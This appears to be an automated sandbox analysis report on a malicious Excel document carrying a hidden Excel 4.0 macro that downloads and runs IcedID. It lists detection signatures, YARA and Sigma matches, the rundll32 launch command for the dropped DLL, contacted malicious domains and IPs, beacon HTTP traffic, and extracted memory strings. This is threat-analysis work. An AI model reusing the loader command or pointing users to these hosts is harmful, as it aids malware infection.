Play interactive tour

Edit tour

Analysis Report document-1915351743.xls

Overview

General Information

Sample Name:	document-1915351743.xls
Analysis ID:	356250
MD5:	976d437fbf1c1598413411d366092cb6
SHA1:	ab1c382ec0a25bd9881eee9a3401c9e1b78ee4e5
SHA256:	21944a6a3c05598d1cdc6893c982e22d81344ff8bc8225811691512976aa6bcc
Tags:	SilentBuilderxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0 IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Found malicious Excel 4.0 Macro

Multi AV Scanner detection for dropped file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected IcedID

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect virtualization through RDTSC time measurements

Yara detected hidden Macro 4.0 in Excel

Adds / modifies Windows certificates

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2332 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2324 cmdline: rundll32 ..\idefje.ekfd,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
document-1915351743.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0x11c55:$e1: Enable Editing 0x11cca:$e2: Enable Content
document-1915351743.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x13ca2:$s1: Excel 0x14cfd:$s1: Excel 0x36bd:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1915351743.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security
Process Memory Space: rundll32.exe PID: 2324	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.rundll32.exe.7feea7c0000.10.unpack	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\idefje.ekfd,DllRegisterServer, CommandLine: rundll32 ..\idefje.ekfd,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2332, ProcessCommandLine: rundll32 ..\idefje.ekfd,DllRegisterServer, ProcessId: 2324

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif	ReversingLabs: Detection: 41%
Source: C:\Users\user\idefje.ekfd	ReversingLabs: Detection: 41%

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Show sources

Source: unknown

HTTPS traffic detected: 143.204.4.74:443 -> 192.168.2.22:49167 version: TLS 1.0

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 197.242.147.47:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 1802[1].gif.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Source: global traffic

DNS query: name: miraclecollagen.co.za

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 197.242.147.47:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 197.242.147.47:443

Networking:

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=620514333:1:5267:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373833383735:416C627573; __io=0; _gid=67AFEDC5AC03Host: oskolko.uno

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: unknown

HTTPS traffic detected: 143.204.4.74:443 -> 192.168.2.22:49167 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: global traffic

Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: miraclecollagen.co.za

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Feb 2021 19:13:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 39 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 73 6b 6f 6c 6b 6f 2e 75 6e 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 109<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at oskolko.uno Port 80</address></body></html>0

Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: idefje.ekfd.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: idefje.ekfd.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: idefje.ekfd.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://oskolko.uno/om/
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.34/js
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.63
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.373
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.373/style-awsm.css
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logo
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/directories
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/libra-cardsui
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/libra-head.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.373/librastandardlib
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.107/plc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/target/1.0.112/aws-target-mediator.js
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/Y
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2128397366.0000000000379000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/ar/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/cn/
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/de/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/es/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/fr/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/id/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/it/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/jp/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/ko/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace?aws=hp
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/pt/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/ru/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/th/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/tr/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/tw/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/vi/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	String found in binary or memory: https://d1.awsstatic.com
